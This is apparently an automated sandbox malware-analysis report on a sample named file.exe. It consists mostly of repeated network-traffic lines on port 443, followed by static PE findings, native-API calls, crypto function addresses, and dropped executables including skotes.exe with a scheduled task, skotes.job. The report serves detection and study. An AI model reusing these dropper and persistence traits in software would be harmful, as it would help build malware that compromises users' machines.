Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49951 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50003 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: KKFBAAFCGI.exe.0.dr Static PE information: section name:
Source: KKFBAAFCGI.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.14.dr Static PE information: section name:
Source: skotes.exe.14.dr Static PE information: section name: .idata
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C9CB700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C9CB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C9CB910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C96F280
Creates files inside the system directory
Source: C:\Users\user\Documents\KKFBAAFCGI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9635A0 0_2_6C9635A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C976C80 0_2_6C976C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C34A0 0_2_6C9C34A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CC4A0 0_2_6C9CC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C98D4D0 0_2_6C98D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9764C0 0_2_6C9764C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A6CF0 0_2_6C9A6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96D4E0 0_2_6C96D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A5C10 0_2_6C9A5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B2C10 0_2_6C9B2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DAC00 0_2_6C9DAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D542B 0_2_6C9D542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D545C 0_2_6C9D545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C975440 0_2_6C975440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A0DD0 0_2_6C9A0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C85F0 0_2_6C9C85F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C98ED10 0_2_6C98ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C990512 0_2_6C990512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C97FD00 0_2_6C97FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C985E90 0_2_6C985E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CE680 0_2_6C9CE680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C4EA0 0_2_6C9C4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96BEF0 0_2_6C96BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C97FEF0 0_2_6C97FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D76E3 0_2_6C9D76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A7E10 0_2_6C9A7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B5600 0_2_6C9B5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C9E30 0_2_6C9C9E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C989E50 0_2_6C989E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A3E50 0_2_6C9A3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B2E4E 0_2_6C9B2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C984640 0_2_6C984640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96C670 0_2_6C96C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D6E63 0_2_6C9D6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B77A0 0_2_6C9B77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C996FF0 0_2_6C996FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96DFE0 0_2_6C96DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9A7710 0_2_6C9A7710
